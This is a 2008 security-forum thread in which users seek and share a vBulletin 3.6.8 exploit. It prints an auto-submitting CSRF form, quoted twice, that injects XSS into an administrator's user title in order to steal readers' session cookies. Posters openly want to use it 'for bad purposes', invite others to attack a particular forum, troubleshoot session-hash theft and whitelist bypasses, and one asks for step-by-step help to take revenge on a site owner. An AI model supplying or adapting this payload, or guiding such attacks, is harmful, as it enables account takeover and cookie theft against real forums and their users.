 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 134
 Members: 0
 Total: 134
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
vbulletin 3.6.8 exploit |
|
 Posted: Tue Apr 01, 2008 5:36 pm |
 |
|
| akrlot |
| Beginner |
 |
|
| Joined: Apr 01, 2008 |
| Posts: 4 |
|
|
|
 |
|
 |
|
hello;
does anybody have an exploit for vbulletin 3.6.8?
please pm me. i will use it for bad purposes... |
|
|
|
|
| Posted: Tue Apr 01, 2008 8:13 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| I don't see working Xploit for vBulletin v 3.6.8. |
|
|
|
|
|
|
|
|
| Posted: Sat Apr 05, 2008 9:03 am |
|
|
| NEUR0BASHER |
| Regular user |
|
|
| Joined: Apr 05, 2008 |
| Posts: 6 |
|
|
|
|
|
|
|
Hi!
vBulletin 3.6.8 XSRF/XSS Vulnerability
vBulletin Version: 3.6.8 Patch Level x and possible lower
As administrators can use html in the usertitle an attacker can update the profile of an administrator by sending a link to a site with a code like this:
| Code: | <html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile";
method="POST" name="form">
<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>
|
If the attacker sends a link to the admin (in a pm for example) the admin's usertitle will be updated and contains the new code of the attacker now. The code will be executed as soon as the admin has submitted a new posting. Now the attacker can steal the cookies of user's who are reading the thread.
Is anyone interested to try this exploit with me on a particular forum? I know one forum that has enabled html entities would be easy to gain admin access.
cheers
neuro |
|
|
|
|
|
|
|
|
| Posted: Sun Apr 06, 2008 4:28 am |
|
|
| gibbocool |
| Advanced user |
 |
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
Very nice, it's working great for me 
I'm having a problem saving the cookie though, I'm just using document.cookie and it isn't getting bbsessionhash. It's only getting bblastvisit and bblastactivity. What's going on?
Also it looks like you need have the html page on the same domain as the forum, or it won't accept it as it's not on the whitelist. |
|
|
|
|
|
|
|
|
| Posted: Tue Apr 08, 2008 6:13 pm |
|
|
| NEUR0BASHER |
| Regular user |
|
|
| Joined: Apr 05, 2008 |
| Posts: 6 |
|
|
|
|
|
|
|
| gibbocool wrote: | | it isn't getting bbsessionhash. It's only getting bblastvisit and bblastactivity. Also it looks like you need have the html page on the same domain as the forum, or it won't accept it as it's not on the whitelist. |
Hi! That's extactly the problem: You won't get the bbsessionhash with the cookie as the php skript must run on the same server as the vbulletin software (see: http://www.waraxe.us/ftopict-2506.html ).
It will only work this way: The php code must be embedded into site admin's user title:
| Quote: | | the admin's usertitle will be updated and contains the new code of the attacker now. The code will be executed as soon as the admin has submitted a new posting. Now the attacker can steal the cookies of user's who are reading the thread |
|
|
|
|
|
|
|
|
|
| Posted: Sat May 24, 2008 5:37 am |
|
|
| aquadeluxe |
| Regular user |
|
|
| Joined: Jan 03, 2008 |
| Posts: 11 |
|
|
|
|
|
|
|
| I am trying to use this. I have gotten everything working for what I want, but when I try to execute it, it says the server doesn't allow POST through my server due to it not being in a whitelist. As I do not know the whitelist, I uploaded the file as a doc on the forum, then I used readfile() in PHP and set the header as HTML and it wouldn't work correctly. Pretty much what I need to do is load the "doc" file as an HTML file on there server. Is there any way of doing that? |
|
|
|
|
|
|
|
|
| Posted: Sat May 24, 2008 12:59 pm |
|
|
| gibbocool |
| Advanced user |
|
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
| aquadeluxe wrote: | | I am trying to use this. I have gotten everything working for what I want, but when I try to execute it, it says the server doesn't allow POST through my server due to it not being in a whitelist. As I do not know the whitelist, I uploaded the file as a doc on the forum, then I used readfile() in PHP and set the header as HTML and it wouldn't work correctly. Pretty much what I need to do is load the "doc" file as an HTML file on there server. Is there any way of doing that? |
If there was a way of doing that it would make life very easy.
If the forum has html enabled you could just put the xss code in a post. |
|
|
|
|
| Posted: Mon Jun 16, 2008 12:57 pm |
|
|
| Messenger_of_Death |
| Beginner |
|
|
| Joined: Jun 16, 2008 |
| Posts: 2 |
|
|
|
|
|
|
|
|
Last edited by Messenger_of_Death on Tue Jun 17, 2008 8:18 am; edited 1 time in total |
|
|
|
| Posted: Mon Jun 16, 2008 10:58 pm |
|
|
| tr0nix |
| Active user |
|
|
| Joined: Mar 06, 2008 |
| Posts: 48 |
|
|
|
|
|
|
|
| Messenger_of_Death wrote: | | How can i hack *CENSORED* |
man, read the damn rules!
no sites / ips! |
|
|
|
|
| Posted: Tue Jun 17, 2008 8:19 am |
|
|
| Messenger_of_Death |
| Beginner |
|
|
| Joined: Jun 16, 2008 |
| Posts: 2 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Mon Oct 20, 2008 12:16 am |
|
|
| TDawg |
| Beginner |
|
|
| Joined: Oct 20, 2008 |
| Posts: 2 |
|
|
|
|
|
|
|
| NEUR0BASHER wrote: | Hi!
vBulletin 3.6.8 XSRF/XSS Vulnerability
vBulletin Version: 3.6.8 Patch Level x and possible lower
As administrators can use html in the usertitle an attacker can update the profile of an administrator by sending a link to a site with a code like this:
| Code: | <html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile";
method="POST" name="form">
<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>
|
If the attacker sends a link to the admin (in a pm for example) the admin's usertitle will be updated and contains the new code of the attacker now. The code will be executed as soon as the admin has submitted a new posting. Now the attacker can steal the cookies of user's who are reading the thread.
Is anyone interested to try this exploit with me on a particular forum? I know one forum that has enabled html entities would be easy to gain admin access.
cheers
neuro |
Could someone give me a step by step on this.... It would be a great help... This forum that I want to use this on are total pricks and the owner of the site totally bashed a good great of mine for no reason at all.....AND I WANT TO GET EVEN !!!!! Please help |
|
|
|
|
|
|
|
|
| Posted: Mon Aug 03, 2009 3:01 am |
|
|
| mRnOnAmEv |
| Beginner |
|
|
| Joined: Aug 02, 2009 |
| Posts: 2 |
|
|
|
|
|
|
|
| Has anyone got this to work on 3.6.8? |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
